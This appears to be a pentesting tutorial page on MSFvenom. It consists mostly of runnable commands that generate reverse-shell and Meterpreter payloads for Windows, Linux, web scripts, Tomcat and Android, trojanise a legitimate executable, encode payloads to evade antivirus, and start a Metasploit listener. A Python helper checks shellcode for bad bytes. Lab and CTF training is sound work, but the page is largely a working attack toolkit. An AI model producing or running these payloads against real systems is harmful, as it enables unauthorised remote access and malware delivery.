What is MSFvenom?
MSFvenom is Metasploit Framework's unified payload generator and encoder. It replaced the older msfpayload and msfencode tools by merging both functions into a single command. With MSFvenom, security professionals can generate shellcode and standalone executables for virtually any target platform — Windows, Linux, macOS, Android, PHP, Python, and more — in dozens of output formats including .exe, .apk, .elf, raw shellcode, and PowerShell scripts.
Generated payloads are typically used alongside a Metasploit listener (multi/handler) to catch incoming reverse shell connections during authorized penetration tests. Encoding options help evade basic signature-based antivirus detection in lab and CTF environments.
MSFvenom generates malicious executables. Only use in authorized lab environments, CTF challenges, or systems you have explicit written permission to test. Creation or deployment of payloads against unauthorized targets violates Pakistan's PECA 2016 and international cybercrime laws.
Installation
```bash
# MSFvenom is bundled with Metasploit Framework (pre-installed on Kali)
sudo apt update
sudo apt install metasploit-framework -y

# Verify
msfvenom --version

# List all available payloads
msfvenom --list payloads

# List all output formats
msfvenom --list formats

# List all encoders
msfvenom --list encoders
```
Understanding Payload Types
MSFvenom payloads fall into two main categories. Choosing the right one depends on your network setup and the target environment.
```bash
# REVERSE SHELL — target connects back to your machine (most common)
# Use when: you can receive inbound connections on your attack machine
# LHOST = your IP, LPORT = port you're listening on

# BIND SHELL — payload opens a port on the target, you connect to it
# Use when: target is reachable but you can't receive inbound connections
# LHOST not needed, LPORT = port that opens on the target

# Stageless payloads (recommended for reliability):
# windows/x64/shell_reverse_tcp — single self-contained payload

# Staged payloads (smaller initial stager, pulls stage from listener):
# windows/x64/shell/reverse_tcp — requires active Metasploit handler
```
Windows Payloads
```bash
# Stageless reverse TCP shell (.exe) — Windows 64-bit
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f exe -o shell.exe

# Staged Meterpreter reverse HTTPS — Windows 64-bit (encrypted comms)
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.5 LPORT=443 -f exe -o meter.exe

# 32-bit reverse shell (for older 32-bit Windows targets)
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f exe -o shell32.exe

# Inject payload into an existing legitimate .exe (template)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 \
  -x /usr/share/windows-binaries/plink.exe -f exe -o trojan.exe

# PowerShell one-liner payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f psh -o payload.ps1
```
Linux Payloads
```bash
# Linux 64-bit reverse shell ELF binary
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f elf -o shell.elf

# Linux Meterpreter reverse TCP
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f elf -o meter.elf

# Make the binary executable after transfer
chmod +x shell.elf
```
Web & Script Payloads
```bash
# PHP reverse shell (upload to vulnerable web app)
msfvenom -p php/reverse_php LHOST=10.10.10.5 LPORT=4444 -f raw -o shell.php

# Python reverse shell
msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.5 LPORT=4444 -f raw -o shell.py

# Bash reverse shell
msfvenom -p cmd/unix/reverse_bash LHOST=10.10.10.5 LPORT=4444 -f raw -o shell.sh

# JSP reverse shell (for Java-based servers like Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f raw -o shell.jsp

# WAR file for Tomcat deployment
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f war -o shell.war
```
Android Payload
```bash
# Android APK reverse shell (lab use only)
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 -o shell.apk
```
Encoding Payloads
Encoders transform the raw shellcode to avoid simple signature detection. Note that modern AV solutions are not reliably bypassed by encoding alone — this is most useful in CTF and lab environments.
```bash
# Encode with x64/xor_dynamic. The classic polymorphic encoder x86/shikata_ga_nai
# is x86-only and will not encode an x64 payload, so it is not used here.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 \
  -e x64/xor_dynamic -i 5 -f exe -o encoded.exe
# -e: encoder to use
# -i: number of encoding iterations (more = harder to detect)

# Show the options (LHOST, LPORT, advanced settings) a payload accepts
msfvenom -p windows/shell_reverse_tcp --list-options

# Encode and remove bad characters (important for buffer overflow exploits)
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 \
  -b "\x00\x0a\x0d" -f c
# -b: bad characters to avoid in the shellcode output
# -f c: output as C array (for embedding in exploit code)
```
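A small checker for the `-f c` output described above, added here as an example and not part of the original page: it parses the `unsigned char buf[]` C array that msfvenom emits and confirms that none of the bytes named in `-b` survived in the result. The array below is constructed for illustration and is not real msfvenom output.

```python
import re

# Constructed sample in the shape of msfvenom's "-f c" output (not real shellcode):
# a declaration line followed by adjacent C string literals of "\xNN" escapes.
SAMPLE_C_OUTPUT = r'''unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\x0d\x0a\x41\x42\x43\x44\x45\x46\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4";
'''

_ESC = re.compile(r'\\x([0-9a-fA-F]{2})')            # one "\xNN" escape
_LITERAL = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')  # one quoted literal


def parse_c_array(text: str) -> bytes:
    """Return the bytes encoded by the string literals of a -f c dump."""
    chunks = _LITERAL.findall(text)
    if not chunks:
        raise ValueError("no C string literals found")
    return bytes(int(h, 16) for lit in chunks for h in _ESC.findall(lit))


def parse_badchars(spec: str) -> bytes:
    """Turn a -b argument such as '\\x00\\x0a\\x0d' into the set of bytes it names."""
    return bytes(int(h, 16) for h in _ESC.findall(spec))


def find_badchars(payload: bytes, bad: bytes) -> dict[int, list[int]]:
    """Map each forbidden byte value that occurs to the offsets where it appears."""
    hits: dict[int, list[int]] = {}
    for offset, b in enumerate(payload):
        if b in bad:
            hits.setdefault(b, []).append(offset)
    return hits


def report(text: str, badspec: str) -> str:
    """Human-readable summary: byte count, offending offsets, clean/not clean."""
    payload = parse_c_array(text)
    hits = find_badchars(payload, parse_badchars(badspec))
    lines = [f"{len(payload)} bytes parsed"]
    for b, offs in sorted(hits.items()):
        lines.append(f"bad byte 0x{b:02x} at offsets {offs}")
    lines.append("clean" if not hits else f"{len(hits)} bad byte value(s) present")
    return "\n".join(lines)


if __name__ == "__main__":
    # The constructed sample deliberately contains 0x0d and 0x0a, so it is reported.
    print(report(SAMPLE_C_OUTPUT, r"\x00\x0a\x0d"))
```

Pipe a real `msfvenom ... -b "..." -f c` run into `parse_c_array` to confirm the exclusion list was honoured before embedding the array in an exploit harness.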
Setting Up the Listener
Every reverse shell payload needs a listener running on your attack machine before the payload executes on the target.
```bash
# Start Metasploit and set up a multi/handler listener
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/shell_reverse_tcp
set LHOST 10.10.10.5
set LPORT 4444
run

# For Meterpreter payloads, match the payload exactly:
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 10.10.10.5
set LPORT 443
run

# Quick one-liner to start a listener without entering msfconsole interactively
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/shell_reverse_tcp; set LHOST 10.10.10.5; set LPORT 4444; run"
```
Common Flags
- -p — Payload to use (e.g. windows/x64/shell_reverse_tcp)
- LHOST — Your IP address (attacker machine)
- LPORT — Port to listen on / connect back to
- -f — Output format: exe, elf, raw, c, psh, war, apk, etc.
- -o — Output file path
- -e — Encoder to use
- -i — Number of encoding iterations
- -b — Bad characters to exclude from shellcode
- -x — Template executable to inject payload into
- --list payloads — List all available payloads
- --list formats — List all supported output formats
- --list encoders — List all available encoders
- --list-options — Show options for a specific payload
Common Use Cases
- Generating reverse shells for post-exploitation after initial access
- Creating payloads for client-side attacks (phishing, USB drops) in authorized red team ops
- Producing raw shellcode for embedding in custom buffer overflow exploits
- CTF challenges requiring reverse shell or RCE exploitation
- Testing EDR and antivirus detection capabilities in controlled lab environments
- Android security research on lab devices
Further Reading
MSFvenom is one half of the equation — understanding how to catch and interact with sessions using msfconsole and Meterpreter is equally important. For AV evasion beyond basic encoding, explore tools like Veil, Shellter, and custom payload obfuscation techniques. Practice the full payload deployment cycle on TryHackMe rooms like "Blue", "Ice", and "Steel Mountain", and on hackzia.site labs.